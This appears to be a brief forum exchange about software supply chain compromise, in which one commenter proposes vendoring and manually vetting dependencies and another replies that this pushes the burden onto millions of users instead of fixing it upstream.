>In any case, if the choice is “frequent supply chain compromise, take it or leave it”, the answer is of course “leave it”.
There's another choice: vendor your dependencies and manually review and vet updates. That solves all your problems, no need for "trusted third parties", you are the one vetting it, only need to trust yourself.
You just make a problem that a couple of thousand people have to a problem for a couple of million.
Fix it early so the user does not have to deal with the complexity is most often the best approach.